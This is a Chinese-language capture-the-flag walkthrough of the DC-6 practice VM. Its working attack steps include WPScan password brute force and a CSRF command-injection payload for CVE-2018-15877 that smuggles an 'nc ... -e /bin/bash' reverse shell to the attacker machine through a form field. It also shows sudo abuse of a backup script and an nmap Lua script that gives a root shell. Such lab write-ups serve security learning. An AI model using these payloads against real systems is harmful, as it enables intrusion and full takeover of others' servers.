DC6靶机渗透测试
環境版本:
- VMware pro 16
- Kali 2021.1(虛擬機)
- DC-6(虛擬機)
一、信息收集
1.主機發現
arp-scan -l
2.端口掃描
nmap -A -p- 192.168.2.170
發現開啟了 22 端口:ssh服務
80 端口:http服務,wordpress框架
域名:wordy,映射 ip:192.168.2.170
二、漏洞掃描
1.訪問 web 服務
發現 ip 自動跳轉為域名,但是無法解析
在 /etc/hosts 文件中添加解析
echo '192.168.2.170 wordy'>>/etc/hosts
再次訪問發現主頁,查看頁面
2.使用 WPScan 進行用戶名掃描
wpscan --url http://wordy -e u
3.對用戶進行密碼爆破
根據作者提示:
我們進入對應目錄,獲取密碼本
cd /usr/share/wordlists
gunzip rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
進行爆破:
wpscan --url http://wordy -P ./passwords.txt
得到一個用戶名及密碼:Username: mark, Password: helpdesk01
4.目錄掃描,查找后臺
nikto -h 192.168.2.170
發現后臺
5.進入后臺,收集信息
發現 activity monitor 插件,在 kali 中搜索相關漏洞
6.漏洞搜索
searchsploit activity monitor
發現相關漏洞,使用 cat 打印進行查看信息
cd /usr/share/exploitdb/exploits/php/webapps
cat ./45274.html
45274.html
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing listDescription:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/PoC:
--><html><!-- Wordpress Plainview Activity Monitor RCE[+] Version: 20161228 and possibly prior[+] Description: Combine OS Commanding and CSRF to get reverse shell[+] Author: LydA(c)ric LEFEBVRE[+] CVE-ID: CVE-2018-15877[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well--><body><script>history.pushState('', '', '/')</script><form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"><input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /><input type="hidden" name="lookup" value="Lookup" /><input type="submit" value="Submit request" /></form></body>
</html>
發現是 csrf 漏洞,我們對其主要部分進行提取修改:
修改 域名 及 nc 連接
<html><!-- Wordpress Plainview Activity Monitor RCE[+] Version: 20161228 and possibly prior[+] Description: Combine OS Commanding and CSRF to get reverse shell[+] Author: LydA(c)ric LEFEBVRE[+] CVE-ID: CVE-2018-15877[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well--><body><script>history.pushState('', '', '/')</script><form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"><input type="hidden" name="ip" value="google.fr| nc 192.168.2.154 9999 -e /bin/bash" /><input type="hidden" name="lookup" value="Lookup" /><input type="submit" value="Submit request" /></form></body>
</html>
將其命名為 1.html 保存到桌面
7.使用 nc 連接
攻擊機監聽:
nc -lvvp 9999
訪問 1.html(也可用burp suite找到對應位置進行改包)
得到靶機 shell
8.進行信息收集
發現在 mark 用戶下有添加用戶命令執行結果,得到明文密碼,結合靶機開啟的 shh 端口,嘗試登入
9.ssh 連接
ssh graham@192.168.2.170
yes
GSo7isUM1D4
三、提權
1.嘗試 sudo 提權
sudo -l
發現可以 jens 用戶權限執行 /home/jens/backups.sh 文件
使用 /bin/bash 替換 baskups.sh 內容
echo '/bin/bash' > /home/jens/backups.sh
cat /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
執行上述命令發現用戶已切換,查看 jens 用戶權限
發現權限并不高,繼續嘗試 sudo 提權
sudo -l
發現可以不需要密碼以 root 權限執行 nmap
利用 nmap 可以執行腳本進行獲取 root 權限
cd /tmp
echo 'os.execute("/bin/bash")'>shell
sudo nmap --script=shell
發現當前 shell 沒有交互,查看是否有 python,使用其進行 get 新 shell
python -V
python -c "import pty;pty.spawn('/bin/bash')"
cd /root
cat theflag.txt
總結
